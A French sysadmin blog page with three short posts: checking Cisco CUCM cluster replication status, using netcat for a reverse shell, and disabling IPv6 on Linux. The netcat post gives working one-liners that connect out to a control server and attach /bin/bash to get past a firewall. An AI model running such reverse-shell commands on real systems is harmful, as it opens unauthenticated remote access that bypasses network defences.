[CUCM] Vérifier le statut de réplication entre les membres

Dans un cluster Cisco CUCM composé d’un publisher et de plusieurs subscribers, il arrive que la base de donnée répartie ne soit plus bien synchronisée entre les membres.
Il est critique de réaliser ce diagnostic au plus tôt : la procédure ci-dessous explique comment le réaliser.

Il faut tout d’abord se connecter sur le Publisher (dans notre cas c’est un serveur en version 8.0.3) en SSH et taper la commande utils dbreplication status

admin:utils dbreplication status

-------------------- utils dbreplication status --------------------

Replication status check is now running in background.
Use command 'utils dbreplication runtimestate' to check its progress

The final output will be in file cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out

Please use "file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out " command to see the output
admin:

La vérification du bon statut de réplication prend du temps : le fichier de résultat ne doit pas être visionné immédiatement. Pour évaluer la progression de ce diagnostic, il faut utiliser la commande utils dbreplication runtimestate

admin:utils dbreplication runtimestate

DB and Replication Services: ALL RUNNING

Cluster Replication State: Replication status command started at: 2012-01-19-08-31
Replication status command in PROGRESS 421 tables checked out of 519
Processing Table: gatewaylayout

Use 'file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out' to see the details

DB Version: ccm8_0_3_20000_2
Number of replicated tables: 519

Cluster Detailed View from PUB (4 Servers):

PING REPLICATION REPL. DBver& REPL. REPLICATION SETUP
SERVER-NAME IP ADDRESS (msec) RPC? STATUS QUEUE TABLES LOOP? (RTMT) & details
----------- ------------ ------ ---- ----------- ----- ------- ----- -----------------
PUB1 192.168.1.65 0.029 Yes Connected 0 match N/A (2) PUB Setup Completed
SUB1 192.168.1.66 0.183 Yes Connected 0 match N/A (2) Setup Completed
SUB2 192.168.1.67 4.37 Yes Connected 0 match N/A (2) Setup Completed
SUB3 192.168.1.77 3.78 Yes Connected 0 match N/A (2) Setup Completed

admin:

la ligne en gras « Replication status command in PROGRESS 421 tables checked out of 519 » permet de connaitre l’avancement.

La colonne « Replication Loop » peut contenir 3 valeurs :

  • 1 : initializing
  • 2 : ok
  • 3 : failed

Une fois le process de statut terminé, on peut visualiser le statut définitif

admin:utils dbreplication runtimestate

DB and Replication Services: ALL RUNNING

Cluster Replication State: Replication status command started at: 2012-01-19-13-44
Replication status command COMPLETED 519 tables checked out of 519
No Errors or Mismatches found.

Use 'file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_13_44_12.out' to see the details

DB Version: ccm8_0_3_20000_2
Number of replicated tables: 519

Cluster Detailed View from PUB (4 Servers):

PING REPLICATION REPL. DBver& REPL. REPLICATION SETUP
SERVER-NAME IP ADDRESS (msec) RPC? STATUS QUEUE TABLES LOOP? (RTMT) & details
----------- ------------ ------ ---- ----------- ----- ------- ----- -----------------
PUB1 192.168.1.65 0.025 Yes Connected 0 match N/A (2) PUB Setup Completed
SUB1 192.168.1.181 Yes Connected 444 match N/A (2) Setup Completed
SUB2 192.168.1.67 1.11 Yes Connected 444 match N/A (2) Setup Completed
SUB3 192.168.1.77 1.11 Yes Connected 444 match N/A (2) Setup Completed

Post to Twitter

Posted in | Tagged , , , | Leave a comment

Netcat et « -e invalid option »

Il est souvent très utile de creer un reverse backdoor shell sur un serveur qui n’est pas accessible directement (par exemple derrière un firewall). C’est alors ce serveur qui lance une connexion sortante vers notre serveur de contrôle.

Or sur certaines distributions (dont Ubuntu, Mint,etc..) netcat (ou « nc ») ne dispose pas de l’option « -e » qui permet de lui attacher un shell (ou autre).

On obtient alors ce message d’erreur :

#nc master_srv 1234 -e /bin/bash
nc: invalid option -- 'e'

Il suffit alors d’installer le package « netcat » :

apt-get install netcat

Et d’utiliser la commande « nc.traditional » :

nc.traditional master_srv 1234 -e /bin/bash

PS : Attention, le flux passe en clair et sans authentification.
Bref, c’est un outil à utiliser de manière très ponctuelle et en connaissance de cause.

Post to Twitter

Posted in | Tagged , , | Leave a comment

Désactiver ipv6 sur Linux

Par défaut ipv6 est activé sur Linux ce qui peut nuire à la lisibilité de certaines commandes :

randco@RANDCO-S002 ~ $<strong> ip address</strong>
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:01:c0:06:41:38 brd ff:ff:ff:ff:ff:ff
inet6 fe80::201:c0ff:fe06:4138/64 scope link
valid_lft forever preferred_lft forever
3: eth1: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:01:c0:06:41:39 brd ff:ff:ff:ff:ff:ff
inet6 fe80::201:c0ff:fe06:4139/64 scope link
valid_lft forever preferred_lft forever
4: wlan0: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state DORMANT qlen 1000
link/ether 00:0d:f0:8d:4c:93 brd ff:ff:ff:ff:ff:ff
inet6 fe80::20d:f0ff:fe8d:4c93/64 scope link
valid_lft forever preferred_lft forever
5: br0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UNKNOWN
link/ether 00:01:c0:06:41:38 brd ff:ff:ff:ff:ff:ff
inet6 fe80::201:c0ff:fe06:4138/64 scope link
valid_lft forever preferred_lft forever
6: eth2: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc pfifo_fast state DOWN qlen 1000
link/ether 1c:7e:e5:0f:dc:31 brd ff:ff:ff:ff:ff:ff

La façon la plus simple et la plus efficace (c-a-d quelle que soit la distribution ou les mise à jour postérieures réalisées ensuite) consiste à créer le fichier suivant : /etc/modprobe.d/00local

Le contenu de ce fichier sera le suivant :

alias net-pf-10 off
alias ipv6 off

Un reboot est alors nécessaire pour la prise en compte de ces modifications.
Cependant sur les kernels récents, ipv6 est intégré au noyau (et non plus chargé via des modules).
Dans ce cas, il faut utiliser la commande suivante :

echo "1" > /proc/sys/net/ipv6/conf/all/disable_ipv6  

Pour l’automatiser, on peut ajouter la ligne suivante au fichier /etc/sysctl.conf :

net.ipv6.conf.all.disable_ipv6=1

On peut constater la bonne désactivation d’ipv6 :

RANDCO-S002 ~ # <strong>ip address</strong>
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:01:c0:06:41:38 brd ff:ff:ff:ff:ff:ff
3: eth1: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:01:c0:06:41:39 brd ff:ff:ff:ff:ff:ff
4: wlan0: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state DORMANT qlen 1000
link/ether 00:0d:f0:8d:4c:93 brd ff:ff:ff:ff:ff:ff
5: br0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UNKNOWN
link/ether 00:01:c0:06:41:38 brd ff:ff:ff:ff:ff:ff
6: eth2: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc pfifo_fast state DOWN qlen 1000
link/ether 1c:7e:e5:0f:dc:31 brd ff:ff:ff:ff:ff:ff
&nbsp;

Post to Twitter

Posted in | Tagged , | Leave a comment